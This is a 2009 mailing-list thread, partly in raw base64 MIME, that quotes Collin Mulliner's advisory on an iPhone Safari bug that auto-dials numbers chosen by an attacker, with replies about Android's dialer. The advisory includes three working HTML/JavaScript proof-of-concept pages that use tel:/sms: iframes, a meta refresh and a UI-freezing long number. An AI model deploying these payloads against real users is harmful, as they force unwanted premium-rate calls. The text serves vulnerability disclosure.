c2FnZSBib3ggYXNraW5nIHRoZSB1c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBu
dW1iZXIuIFRoZQ0KPiAgIHVzZXIgaXMgcHJlc2VudGVkIHdpdGggdGhlIHNpbXBsZSBjaG9pY2Ug
dG8gZWl0aGVyIHByZXNzIGNhbGwgb3INCj4gICBjYW5jZWwuDQo+DQo+ICAgQSBURUwgVVJJIGNh
biBiZSBvcGVuZWQgYXV0b21hdGljYWxseSBpZiB0aGUgVEVMIFVSSSBpcyB1c2VkIGFzIHRoZQ0K
PiAgIHNvdXJjZSBvZiBhbiBIVE1MIGlmcmFtZSBvciBmcmFtZSwgYXMgdGhlIFVSTCBvZiBhIG1l
dGEgcmVmcmVzaCwgYXMNCj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwg
YW5kIGFzIHRoZSBsb2NhdGlvbiBvZiB0aGUNCj4gICBjdXJyZW50IG9yIGEgbmV3IHdpbmRvdyB1
c2luZyBqYXZhc2NyaXB0Lg0KPg0KPiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJh
YmlsaXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPiAgIHBlcm1pc3Npb24gdG8gY2Fs
bCIgZGlhbG9nIGluIGEgd2F5IHRoYXQgY2hvb3NlcyB0aGUgImNhbGwiIG9wdGlvbg0KPiAgIHJh
dGhlciB0aGFuIHRoZSAiY2FuY2VsIiBvcHRpb24uDQo+CQ0KPiAgIFRoaXMgY29uZGl0aW9uIG9j
Y3VycyBpZiBhIFRFTCBVUkkgaXMgYWN0aXZhdGVkIGF0IHRoZSBzYW1lIHRpbWUNCj4gICBTYWZh
cmkgaXMgY2xvc2VkIGJ5IGxhdW5jaGluZyBhbiBleHRlcm5hbCBhcHBsaWNhdGlvbiwgZm9yIGV4
YW1wbGUNCj4gICBsYXVuY2hpbmcgdGhlIFNNUyBhcHBsaWNhdGlvbiAoaW4gb3JkZXIgdG8gaGFu
ZGxlIGEgU01TIFVSSSBbMl0pLiBUaGUNCj4gICBTTVMgYXBwbGljYXRpb24gY2FuIGJlIGxhdW5j
aGVkIHRocm91Z2ggcGxhY2luZyBhIFNNUyBVUkkgYXMgdGhlDQo+ICAgc291cmNlIG9mIGFuIGlm
cmFtZS4gVGhpcyBpcyBzaG93biBpbiB0aGUgZmlyc3QgcHJvb2Ytb2YtY29uY2VwdA0KPiAgIGV4
cGxvaXQgYmVsb3cuDQo+CQ0KPiAgIEZ1cnRoZXIgaW52ZXN0aWdhdGlvbiBzaG93ZWQgdGhhdCB0
aGlzIGJlaGF2aW9yIGNhbiBiZSByZXByb2R1Y2VkIGJ5DQo+ICAgbGF1bmNoaW5nIG90aGVyIGFw
cGxpY2F0aW9ucyBzdWNoIGFzOiBNYXBzLCBZb3VUdWJlLCBhbmQgaVR1bmVzLg0KPiAgIExhdW5j
aGluZyB0aGVzZSBhcHBsaWNhdGlvbnMgY2FuIGJlIGFjaGlldmVkIHRocm91Z2ggbG9hZGluZyBz
cGVjaWFsDQo+ICAgVVJMcyB1c2luZyB0aGUgbWV0YSByZWZyZXNoIHRhZy4gVGhpcyBpcyBzaG93
biBpbiB0aGUgc2Vjb25kDQo+ICAgcHJvb2Ytb2YtY29uY2VwdCBleHBsb2l0IGJlbG93Lg0KPg0K
PiAgIFdlIGFsc28gZGlzY292ZXJlZCB0aGF0IHRoZSBidWcgY2FuIGFsc28gYmUgdHJpZ2dlcmVk
IHRocm91Z2ggcG9wdXANCj4gICB3aW5kb3dzIChlLmcuIGphdmFzY3JpcHQgYWxlcnQpLiBJbiB0
aGlzIHNpdHVhdGlvbiB0aGUgaW5pdGlhdGluZyBhcHANCj4gICBkb2VzIG5vdCBuZWVkIHRvIGJl
IHRlcm1pYW50ZWQgaW4gb3JkZXIgdG8gYWN0aXZlIHRoZSBjYWxsLg0KPgkNCj4gICBGaW5hbGx5
LCB3ZSBkaXNjb3ZlcmVkIGEgc2Vjb25kIGJ1ZyB0aGF0IGNhbiBiZSB1c2VkIHRvIHBlcmZvcm0N
Cj4gICBtYWxpY2lvdXMgcGhvbmUgY2FsbHMgdGhhdCBjYW5ub3QgYmUgcHJldmVudGVkIG9yIGNh
bmNlbGVkIGJ5IHRoZQ0KPiAgIHZpY3RpbS4gVGhpcyBidWcgYWxsb3dzIHRoZSBhdHRhY2tlciB0
byBmcmVleiB0aGUgR1VJIChncmFwaGljYWwgdXNlcg0KPiAgIGludGVyZmFjZSkgZm9yIGEgbnVt
YmVyIG9mIHNlY29uZHMuIFdoaWxlIHRoZSBHVUkgaXMgZnJvemVuIHRoZSBjYWxsDQo+ICAgcHJv
Z3Jlc3NlcyBpbgl0aGUgYmFja2dyb3VuZCBhbmQgY2Fubm90IGJlIHN0b3BwZWQgYnkgdGhlIHZp
Y3RpbSB1c2VyLg0KPiAgIEZyZWV6aW5nIHRoZSBHVUkgaXMgYWNoaWV2ZWQgYnkgcGFzc2luZyBh
ICJ2ZXJ5IGxvbmciIHBob25lIG51bWJlciB0bw0KPiAgIHRoZSBTTVMgYXBwbGljYXRpb24uIFRo
ZSBTTVMgYXBwbGljYXRpb24sIGltbWVkaWF0ZWx5IGFmdGVyIGJlaW5nDQo+ICAgc3RhcnRlZCwg
ZnJlZXplcyB0aGUgaVBob25lIEdVSS4gQWxzbyBzd2l0Y2hpbmcgb2ZmIHRoZSBpUGhvbmUgY2Fu
bm90DQo+ICAgYmUgcGVyZm9ybWVkIGZhc3QgZW5vdWdoIGluIG9yZGVyIHRvIHByZXZlbnQgdGhl
IG1hbGljaW91cyBjYWxsLg0KPgkNCj4NCj4gICBbMV0gaHR0cDovL3d3dy5yZmMtZWRpdG9yLm9y
Zy9yZmMvcmZjMzk2Ni50eHQNCj4gICBbMl0gaHR0cDovL3Rvb2xzLmlldGYub3JnL2h0bWwvZHJh
ZnQtYW50dGktZ3NtLXNtcy11cmwtMDQNCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LQ0KPg0KPkZ1cnRoZXIgRGlzY3Vzc2lvbjoNCj4NCj4gICBUaGUgZGlhbGluZyBkaWFsb2cgaXMg
Y2xlYXJseSBzaG93biB0byB0aGUgdXNlciBhbHNvIHRoZSB1c2VyLCBpbiBtb3N0DQo+ICAgY2Fz
ZXMsIGNhbid0IHByZXNzIGNhbmNlbCBxdWljayBlbm91Z2ggaW4gb3JkZXIgdG8gc3RvcCB0aGUg
aW5pdGlhdGlvbg0KPiAgIG9mIHRoZSBjYWxsLiBPbmNlIHRoZSBleHRlcm5hbCBhcHBsaWNhdGlv
biBpcyBsYXVuY2hlZCwgdGhlIHRlbGVwaG9ueQ0KPiAgIGFwcGxpY2F0aW9uIGlzIHJ1bm5pbmcg
aW4gdGhlIGJhY2tncm91bmQgcGVyZm9ybWluZyB0aGUgY2FsbC4gT25seQ0KPiAgIHRoZSBjYWxs
IGZvcndhcmRpbmcgZGlhbG9nIChjb250YWluaW5nIHRoZSAiZGlzbWlzcyIgYnV0dG9uKSBpbmRp
Y2F0ZXMNCj4gICBhIGNhbGwgYmVpbmcgbWFkZS4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLQ0KPg0KPlByb29mLW9mLUNvbmNlcHQgd2l0aCBwbGFpbiBIVE1MIHVzaW5nIHRoZSBT
TVMgYXBwbGljYXRpb246DQo+DQo+ICAgPGh0bWw+DQo+ICAgPGhlYWQ+DQo+ICAgPHRpdGxlPmlQ
aG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsIEV4cGxvaXQgRGVtbyBieSBDb2xsaW4gTXVsbGlu
ZXINCj4gICA8L3RpdGxlPg0KPiAgIDwvaGVhZD4NCj4gICA8Ym9keT4NCj4gICA8aWZyYW1lIHNy
Yz0ic21zOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1lPg0KPiAgIDxp
ZnJhbWUgc3JjPSJ0ZWw6KzE0MDg5NzQ4Mzg4IiBXSURUSD01MCBIRUlHSFQ9MTA+PC9pZnJhbWU+
DQo+ICAgPCEtLSBzZWNvbmQgaWZyYW1lIGlzIHRvIGF0dGFjayBxdWljayB1c2VycyB3aG8gbWFu
YWdlIHRvIGNsb3NlIHRoZQ0KPiAgICAgICAgZmlyc3QgY2FsbC1kaWFsb2cgLy8tLT4NCj4gICA8
aWZyYW1lIHNyYz0idGVsOisxNDA4OTc0ODM4OCIgV0lEVEg9NTAgSEVJR0hUPTEwPjwvaWZyYW1l
Pg0KPiAgIDwvYm9keT4NCj4gICA8L2h0bWw+DQo+DQo+UHJvb2Ytb2YtQ29uY2VwdCB1c2luZyBq
YXZhc2NyaXB0IGFuZCB0aGUgTWFwcyBhcHBsaWNhdGlvbjoNCj4NCj4gICA8aHRtbD4NCj4gICA8
aGVhZD4NCj4gICA8dGl0bGU+aVBob25lIFNhZmFyaSBwaG9uZS1hdXRvLWRpYWwgRXhwbG9pdCBE
ZW1vIGJ5IENvbGxpbiBNdWxsaW5lcg0KPiAgIDwvdGl0bGU+DQo+ICAgPG1ldGEgaHR0cC1lcXVp
dj0icmVmcmVzaCIgY29udGVudD0iMDsNCj4gICBVUkw9aHR0cDovL21hcHMuZ29vZ2xlLmRlL21h
cHM/cT1yaGVpbnN0cmFzc2UrNzUrZGFybXN0YWR0Ij4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+
DQo+ICAgPHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgZnVuY3Rpb24gYSgpIHsNCj4gICAg
ZG9jdW1lbnQud3JpdGUoIjxpZnJhbWUgc3JjPVwidGVsOisxNDA4OTc0ODM4OFwiIFdJRFRIPTUw
IA0KPkhFSUdIVD0xMD48L2lmcmFtZT4iKTsNCj4gICB9DQo+ICAgc2V0VGltZW91dCgiYSgpIiwg
MTAwKTsNCj4gICA8L3NjcmlwdD4NCj4gICA8L2JvZHk+DQo+ICAgPC9odG1sPg0KPgkNCj5Qcm9v
Zi1vZi1Db25jZXB0IGF0dGFjayB3aGVyZSB0aGUgdmljdGltIHVzZXIgY2Fubm90IHN0b3AgdGhl
IG1hbGljaW91cyANCj5waG9uZSBjYWxsOg0KPg0KPiAgIDxodG1sPg0KPiAgIDxoZWFkPg0KPiAg
IDx0aXRsZT5pUGhvbmUgU2FmYXJpIHBob25lLWF1dG8tZGlhbCBFeHBsb2l0IERlbW8gYnkgQ29s
bGluIE11bGxpbmVyDQo+ICAgPC90aXRsZT4NCj4gICA8L2hlYWQ+DQo+ICAgPGJvZHk+DQo+ICAg
PHNjcmlwdCBsYW5nPWphdmFzY3JpcHQ+DQo+ICAgbCA9ICI8aWZyYW1lIHNyYz1cInNtczoiOw0K
PiAgIGZvciAoaSA9IDA7IGkgPCAxMDAwMDsgaSsrKSB7DQo+ICAgICAgICAgICBsID0gbCArICIz
MzQwOTQ4MDM0Mjk4MjMyIjsNCj4gICB9DQo+ICAgbCA9IGwgKyAiXCIgd2lkdGg9MTAgaGVpZ2h0
PTEwPjwvaWZyYW1lPjxpZnJhbWUNCj4gICBzcmM9XCJ0ZWw6KzE0MDg5NzQ4Mzg4XCIgaGVpZ2h0
PTEwIHdpZHRoPTEwPjwvaWZyYW1lPiI7DQo+ICAgZG9jdW1lbnQud3JpdGUobCk7DQo+ICAgPC9z
Y3JpcHQ+DQo+ICAgPC9ib2R5Pg0KPiAgIDwvaHRtbD4NCj4NCj4tLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLQ0KPg0KPk1vcmUgRGV0YWlsZWQgSW5mb3JtYXRpb246DQo+DQo+ICBEZW1vIHZp
ZGVvIGF2YWlsYWJsZSBhdDoNCj4gICBodHRwOi8vd3d3Lm11bGxpbmVyLm9yZy9pcGhvbmUvDQo+
DQo+ICBBZHZpc29yaWVzOg0KPiAgIGh0dHA6Ly93d3cubXVsbGluZXIub3JnL3NlY3VyaXR5L2Fk
dmlzb3JpZXMvDQo+DQo+LS0tIEVORCBBRFZJU09SWSAtLS0NCj4NCj4NCj4tLSANCj5Db2xsaW4g
Ui4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+DQo+aW5mby9wZ3A6IGZpbmdlciBj
b2xsaW5AYmV0YXZlcnNpb24ubmV0DQo+SWYgQmlsbCBHYXRlcyBoYWQgYSBuaWNrZWwgZm9yIGV2
ZXJ5IHRpbWUgV2luZG93cyBjcmFzaGVkLi4uIE9oIHdhaXQsIGhlIA0KPmRvZXMhDQo=

------OOQR8OIVASFMLRMIKQ9G04MAIHM98G--



From: Collin Mulliner collin@betaversion.net
Sent: Thu 18. Jun 2009 19:29
Mike,

just getting to the phone dialer is not a bug! That is what the tel: 
protocol is for. All most all mobile phones implement this, every time 
you open a tel: URL you will get to the dialer in some way.

Collin

Mike Ely wrote:
> Confirmed on the T-Mobile G1 email app running OS version 1.5.  Was wondering why my phone stepped on email to dial out when I read this email and then I read the subject line ;)
> 
> FWIW, it didnt actually dial, just loaded the dialer with that number ready.  
> 
> Looks like this is a Webkit bug, not Safari. 
> 
> Collin Mulliner <collin@betaversion.net> wrote:
> 
>> Released since Apple published the iPhone 3.0 security fixes.
>>
>> Vulnerability Report
>>
>> --- BEGIN ADVISORY ---
>>
>> Manufacturer: Apple (www.apple.com)
>> Device:       iPhone 3G (iPhone 1st Gen)
>> Firmware:     2.1 (possible earlier versions)
>> Device Type:  smart phone
>>
>> Subsystems: Safari (and mobile telephony)
>>
>> -----------------------------
>>
>> Short name:
>>   iPhone Safari phone-auto-dial (vulnerability)
>>
>> Vulnerability class:
>>   application logic bug
>>
>> Executive Summary:
>>   A malicious website can initiate a phone call without the need of user
>>   interaction. The destination phone number is chosen by the attacker.
>>
>> Risk: MEDIUM-HIGH
>>   Medium to high risk due to the possibility of financial gain through
>>   this attack by calling of premium rate numbers (e.g. 1-900 in the
>>   U.S.). Denial-of-service against arbitrary phone numbers through
>>   mass-calling. User cannot prevent attack.
>>
>> -----------------------------
>>
>> Reporter: Collin Mulliner <collin[AT]mulliner.org>
>>
>> -----------------------------
>>
>> Affiliation: MUlliNER.ORG / the trifinite group / (Fraunhofer SIT)
>>
>> -----------------------------
>>
>> Time line:
>>
>>   Oct. 20. 2008: Reported vulnerability to vendor.
>>   Oct. 20. 2008: Vendor acknowledges receiving our email.
>>                  Not commenting on the vulnerability itself.
>>   Oct. 27. 2008: Sent update to vendor, also requesting a status report.
>>   Oct. 29. 2008: Reply from vendor acknowledging the vulnerability.
>>   Oct. 30. 2008: Sent additional information.
>>   Nov. 13. 2008: Vender says vulnerability is fixed in upcoming OS
>>                  version.
>>   Nov. 20. 2008: Public disclosure.
>>   Jun. 18. 2009: Full-Disclosure.
>>
>> -----------------------------
>>
>> Fix:
>>
>>   iPhone OS 2.2
>>   iPhone OS 2.2.1
>>   iPhone OS 3.0
>> 	
>> -----------------------------
>>
>> Technical Details:
>>
>>   The Safari version running on the iPhone supports handling the TEL [1]
>>   protocol through launching the telephony/dialer application. This is
>>   done by passing the provided phone number to the telephony
>>   application. Under normal conditions, loading a tel: URI results in a
>>   message box asking the users permission to call the given number. The
>>   user is presented with the simple choice to either press call or
>>   cancel.
>>
>>   A TEL URI can be opened automatically if the TEL URI is used as the
>>   source of an HTML iframe or frame, as the URL of a meta refresh, as
>>   the location of a HTTP 30X redirect, and as the location of the
>>   current or a new window using javascript.
>>
>>   We discovered a security vulnerability that dismisses the "ask for
>>   permission to call" dialog in a way that chooses the "call" option
>>   rather than the "cancel" option.
>> 	
>>   This condition occurs if a TEL URI is activated at the same time
>>   Safari is closed by launching an external application, for example
>>   launching the SMS application (in order to handle a SMS URI [2]). The
>>   SMS application can be launched through placing a SMS URI as the
>>   source of an iframe. This is shown in the first proof-of-concept
>>   exploit below.
>> 	
>>   Further investigation showed that this behavior can be reproduced by
>>   launching other applications such as: Maps, YouTube, and iTunes.
>>   Launching these applications can be achieved through loading special
>>   URLs using the meta refresh tag. This is shown in the second
>>   proof-of-concept exploit below.
>>
>>   We also discovered that the bug can also be triggered through popup
>>   windows (e.g. javascript alert). In this situation the initiating app
>>   does not need to be termianted in order to active the call.
>> 	
>>   Finally, we discovered a second bug that can be used to perform
>>   malicious phone calls that cannot be prevented or canceled by the
>>   victim. This bug allows the attacker to freez the GUI (graphical user
>>   interface) for a number of seconds. While the GUI is frozen the call
>>   progresses in	the background and cannot be stopped by the victim user.
>>   Freezing the GUI is achieved by passing a "very long" phone number to
>>   the SMS application. The SMS application, immediately after being
>>   started, freezes the iPhone GUI. Also switching off the iPhone cannot
>>   be performed fast enough in order to prevent the malicious call.
>> 	
>>
>>   [1] http://www.rfc-editor.org/rfc/rfc3966.txt
>>   [2] http://tools.ietf.org/html/draft-antti-gsm-sms-url-04
>>
>> -----------------------------
>>
>> Further Discussion:
>>
>>   The dialing dialog is clearly shown to the user also the user, in most
>>   cases, cant press cancel quick enough in order to stop the initiation
>>   of the call. Once the external application is launched, the telephony
>>   application is running in the background performing the call. Only
>>   the call forwarding dialog (containing the "dismiss" button) indicates
>>   a call being made.
>>
>> -----------------------------
>>
>> Proof-of-Concept with plain HTML using the SMS application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <iframe src="sms:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   <!-- second iframe is to attack quick users who manage to close the
>>        first call-dialog //-->
>>   <iframe src="tel:+14089748388" WIDTH=50 HEIGHT=10></iframe>
>>   </body>
>>   </html>
>>
>> Proof-of-Concept using javascript and the Maps application:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   <meta http-equiv="refresh" content="0;
>>   URL=http://maps.google.de/maps?q=rheinstrasse+75+darmstadt">
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   function a() {
>>    document.write("<iframe src="tel:+14089748388" WIDTH=50 
>> HEIGHT=10></iframe>");
>>   }
>>   setTimeout("a()", 100);
>>   </script>
>>   </body>
>>   </html>
>> 	
>> Proof-of-Concept attack where the victim user cannot stop the malicious 
>> phone call:
>>
>>   <html>
>>   <head>
>>   <title>iPhone Safari phone-auto-dial Exploit Demo by Collin Mulliner
>>   </title>
>>   </head>
>>   <body>
>>   <script lang=javascript>
>>   l = "<iframe src="sms:";
>>   for (i = 0; i < 10000; i++) {
>>           l = l + "3340948034298232";
>>   }
>>   l = l + "" width=10 height=10></iframe><iframe
>>   src="tel:+14089748388" height=10 width=10></iframe>";
>>   document.write(l);
>>   </script>
>>   </body>
>>   </html>
>>
>> -----------------------------
>>
>> More Detailed Information:
>>
>>  Demo video available at:
>>   http://www.mulliner.org/iphone/
>>
>>  Advisories:
>>   http://www.mulliner.org/security/advisories/
>>
>> --- END ADVISORY ---
>>
>>
>> -- 
>> Collin R. Mulliner <collin@betaversion.net>
>> info/pgp: finger collin@betaversion.net
>> If Bill Gates had a nickel for every time Windows crashed... Oh wait, he 
>> does!


-- 
Collin R. Mulliner <collin@betaversion.net>
info/pgp: finger collin@betaversion.net
C gives you enough rope to hang yourself. C++ also gives you the tree 
object to tie it to.


From: Mike Ely me@taupehat.com
Sent: Thu 18. Jun 2009 14:07
------OOQ6QVNMQ89GSPKM03TM81BMDDCI85
Content-Type: text/plain;
 charset=utf-8
Content-Transfer-Encoding: base64

UGVyaGFwcyBub3QgZ2V0dGluZyB0byB0aGUgZGlhbGVyLCBidXQgaGF2aW5nIHRoZSBkaWFsZXIg
bGF1bmNoIGF1dG9tYXRpY2FsbHkganVzdCBmcm9tIHZpZXdpbmcgYW4gZW1haWw/CgpDb2xsaW4g
TXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOgoKPk1pa2UsDQo+DQo+anVz
dCBnZXR0aW5nIHRvIHRoZSBwaG9uZSBkaWFsZXIgaXMgbm90IGEgYnVnISBUaGF0IGlzIHdoYXQg
dGhlIHRlbDogDQo+cHJvdG9jb2wgaXMgZm9yLiBBbGwgbW9zdCBhbGwgbW9iaWxlIHBob25lcyBp
bXBsZW1lbnQgdGhpcywgZXZlcnkgdGltZSANCj55b3Ugb3BlbiBhIHRlbDogVVJMIHlvdSB3aWxs
IGdldCB0byB0aGUgZGlhbGVyIGluIHNvbWUgd2F5Lg0KPg0KPkNvbGxpbg0KPg0KPk1pa2UgRWx5
IHdyb3RlOg0KPj4gQ29uZmlybWVkIG9uIHRoZSBULU1vYmlsZSBHMSBlbWFpbCBhcHAgcnVubmlu
ZyBPUyB2ZXJzaW9uIDEuNS4gIFdhcyB3b25kZXJpbmcgd2h5IG15IHBob25lIHN0ZXBwZWQgb24g
ZW1haWwgdG8gZGlhbCBvdXQgd2hlbiBJIHJlYWQgdGhpcyBlbWFpbCBhbmQgdGhlbiBJIHJlYWQg
dGhlIHN1YmplY3QgbGluZSA7KQ0KPj4gDQo+PiBGV0lXLCBpdCBkaWRuJ3QgYWN0dWFsbHkgZGlh
bCwganVzdCBsb2FkZWQgdGhlIGRpYWxlciB3aXRoIHRoYXQgbnVtYmVyIHJlYWR5LiAgDQo+PiAN
Cj4+IExvb2tzIGxpa2UgdGhpcyBpcyBhIFdlYmtpdCBidWcsIG5vdCBTYWZhcmkuIA0KPj4gDQo+
PiBDb2xsaW4gTXVsbGluZXIgPGNvbGxpbkBiZXRhdmVyc2lvbi5uZXQ+IHdyb3RlOg0KPj4gDQo+
Pj4gUmVsZWFzZWQgc2luY2UgQXBwbGUgcHVibGlzaGVkIHRoZSBpUGhvbmUgMy4wIHNlY3VyaXR5
IGZpeGVzLg0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBSZXBvcnQNCj4+Pg0KPj4+IC0tLSBCRUdJ
TiBBRFZJU09SWSAtLS0NCj4+Pg0KPj4+IE1hbnVmYWN0dXJlcjogQXBwbGUgKHd3dy5hcHBsZS5j
b20pDQo+Pj4gRGV2aWNlOiAgICAgICBpUGhvbmUgM0cgKGlQaG9uZSAxc3QgR2VuKQ0KPj4+IEZp
cm13YXJlOiAgICAgMi4xIChwb3NzaWJsZSBlYXJsaWVyIHZlcnNpb25zKQ0KPj4+IERldmljZSBU
eXBlOiAgc21hcnQgcGhvbmUNCj4+Pg0KPj4+IFN1YnN5c3RlbXM6IFNhZmFyaSAoYW5kIG1vYmls
ZSB0ZWxlcGhvbnkpDQo+Pj4NCj4+PiAtLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLQ0KPj4+
DQo+Pj4gU2hvcnQgbmFtZToNCj4+PiAgIGlQaG9uZSBTYWZhcmkgcGhvbmUtYXV0by1kaWFsICh2
dWxuZXJhYmlsaXR5KQ0KPj4+DQo+Pj4gVnVsbmVyYWJpbGl0eSBjbGFzczoNCj4+PiAgIGFwcGxp
Y2F0aW9uIGxvZ2ljIGJ1Zw0KPj4+DQo+Pj4gRXhlY3V0aXZlIFN1bW1hcnk6DQo+Pj4gICBBIG1h
bGljaW91cyB3ZWJzaXRlIGNhbiBpbml0aWF0ZSBhIHBob25lIGNhbGwgd2l0aG91dCB0aGUgbmVl
ZCBvZiB1c2VyDQo+Pj4gICBpbnRlcmFjdGlvbi4gVGhlIGRlc3RpbmF0aW9uIHBob25lIG51bWJl
ciBpcyBjaG9zZW4gYnkgdGhlIGF0dGFja2VyLg0KPj4+DQo+Pj4gUmlzazogTUVESVVNLUhJR0gN
Cj4+PiAgIE1lZGl1bSB0byBoaWdoIHJpc2sgZHVlIHRvIHRoZSBwb3NzaWJpbGl0eSBvZiBmaW5h
bmNpYWwgZ2FpbiB0aHJvdWdoDQo+Pj4gICB0aGlzIGF0dGFjayBieSBjYWxsaW5nIG9mIHByZW1p
dW0gcmF0ZSBudW1iZXJzIChlLmcuIDEtOTAwIGluIHRoZQ0KPj4+ICAgVS5TLikuIERlbmlhbC1v
Zi1zZXJ2aWNlIGFnYWluc3QgYXJiaXRyYXJ5IHBob25lIG51bWJlcnMgdGhyb3VnaA0KPj4+ICAg
bWFzcy1jYWxsaW5nLiBVc2VyIGNhbm5vdCBwcmV2ZW50IGF0dGFjay4NCj4+Pg0KPj4+IC0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBSZXBvcnRlcjogQ29sbGluIE11bGxp
bmVyIDxjb2xsaW5bQVRdbXVsbGluZXIub3JnPg0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEFmZmlsaWF0aW9uOiBNVWxsaU5FUi5PUkcgLyB0aGUgdHJp
ZmluaXRlIGdyb3VwIC8gKEZyYXVuaG9mZXIgU0lUKQ0KPj4+DQo+Pj4gLS0tLS0tLS0tLS0tLS0t
LS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IFRpbWUgbGluZToNCj4+Pg0KPj4+ICAgT2N0LiAyMC4g
MjAwODogUmVwb3J0ZWQgdnVsbmVyYWJpbGl0eSB0byB2ZW5kb3IuDQo+Pj4gICBPY3QuIDIwLiAy
MDA4OiBWZW5kb3IgYWNrbm93bGVkZ2VzIHJlY2VpdmluZyBvdXIgZW1haWwuDQo+Pj4gICAgICAg
ICAgICAgICAgICBOb3QgY29tbWVudGluZyBvbiB0aGUgdnVsbmVyYWJpbGl0eSBpdHNlbGYuDQo+
Pj4gICBPY3QuIDI3LiAyMDA4OiBTZW50IHVwZGF0ZSB0byB2ZW5kb3IsIGFsc28gcmVxdWVzdGlu
ZyBhIHN0YXR1cyByZXBvcnQuDQo+Pj4gICBPY3QuIDI5LiAyMDA4OiBSZXBseSBmcm9tIHZlbmRv
ciBhY2tub3dsZWRnaW5nIHRoZSB2dWxuZXJhYmlsaXR5Lg0KPj4+ICAgT2N0LiAzMC4gMjAwODog
U2VudCBhZGRpdGlvbmFsIGluZm9ybWF0aW9uLg0KPj4+ICAgTm92LiAxMy4gMjAwODogVmVuZGVy
IHNheXMgdnVsbmVyYWJpbGl0eSBpcyBmaXhlZCBpbiB1cGNvbWluZyBPUw0KPj4+ICAgICAgICAg
ICAgICAgICAgdmVyc2lvbi4NCj4+PiAgIE5vdi4gMjAuIDIwMDg6IFB1YmxpYyBkaXNjbG9zdXJl
Lg0KPj4+ICAgSnVuLiAxOC4gMjAwOTogRnVsbC1EaXNjbG9zdXJlLg0KPj4+DQo+Pj4gLS0tLS0t
LS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0NCj4+Pg0KPj4+IEZpeDoNCj4+Pg0KPj4+ICAgaVBob25l
IE9TIDIuMg0KPj4+ICAgaVBob25lIE9TIDIuMi4xDQo+Pj4gICBpUGhvbmUgT1MgMy4wDQo+Pj4g
CQ0KPj4+IC0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tLS0tDQo+Pj4NCj4+PiBUZWNobmljYWwg
RGV0YWlsczoNCj4+Pg0KPj4+ICAgVGhlIFNhZmFyaSB2ZXJzaW9uIHJ1bm5pbmcgb24gdGhlIGlQ
aG9uZSBzdXBwb3J0cyBoYW5kbGluZyB0aGUgVEVMIFsxXQ0KPj4+ICAgcHJvdG9jb2wgdGhyb3Vn
aCBsYXVuY2hpbmcgdGhlIHRlbGVwaG9ueS9kaWFsZXIgYXBwbGljYXRpb24uIFRoaXMgaXMNCj4+
PiAgIGRvbmUgYnkgcGFzc2luZyB0aGUgcHJvdmlkZWQgcGhvbmUgbnVtYmVyIHRvIHRoZSB0ZWxl
cGhvbnkNCj4+PiAgIGFwcGxpY2F0aW9uLiBVbmRlciBub3JtYWwgY29uZGl0aW9ucywgbG9hZGlu
ZyBhIHRlbDogVVJJIHJlc3VsdHMgaW4gYQ0KPj4+ICAgbWVzc2FnZSBib3ggYXNraW5nIHRoZSB1
c2VyJ3MgcGVybWlzc2lvbiB0byBjYWxsIHRoZSBnaXZlbiBudW1iZXIuIFRoZQ0KPj4+ICAgdXNl
ciBpcyBwcmVzZW50ZWQgd2l0aCB0aGUgc2ltcGxlIGNob2ljZSB0byBlaXRoZXIgcHJlc3MgY2Fs
bCBvcg0KPj4+ICAgY2FuY2VsLg0KPj4+DQo+Pj4gICBBIFRFTCBVUkkgY2FuIGJlIG9wZW5lZCBh
dXRvbWF0aWNhbGx5IGlmIHRoZSBURUwgVVJJIGlzIHVzZWQgYXMgdGhlDQo+Pj4gICBzb3VyY2Ug
b2YgYW4gSFRNTCBpZnJhbWUgb3IgZnJhbWUsIGFzIHRoZSBVUkwgb2YgYSBtZXRhIHJlZnJlc2gs
IGFzDQo+Pj4gICB0aGUgbG9jYXRpb24gb2YgYSBIVFRQIDMwWCByZWRpcmVjdCwgYW5kIGFzIHRo
ZSBsb2NhdGlvbiBvZiB0aGUNCj4+PiAgIGN1cnJlbnQgb3IgYSBuZXcgd2luZG93IHVzaW5nIGph
dmFzY3JpcHQuDQo+Pj4NCj4+PiAgIFdlIGRpc2NvdmVyZWQgYSBzZWN1cml0eSB2dWxuZXJhYmls
aXR5IHRoYXQgZGlzbWlzc2VzIHRoZSAiYXNrIGZvcg0KPj4+ICAgcGVybWlzc2lvbiB0byBjYWxs
IiBkaWFsb2cgaW4gYSB3YXkgdGhhdCBjaG9vc2VzIHRoZSAiY2FsbCIgb3B0aW9uDQo+Pj4gICBy
YXRoZXIgdGhhbiB0aGUgImNhbmNlbCIgb3B0aW9uLg0KPj4+IAkNCj4+PiAgIFRoaXMgY29uZGl0
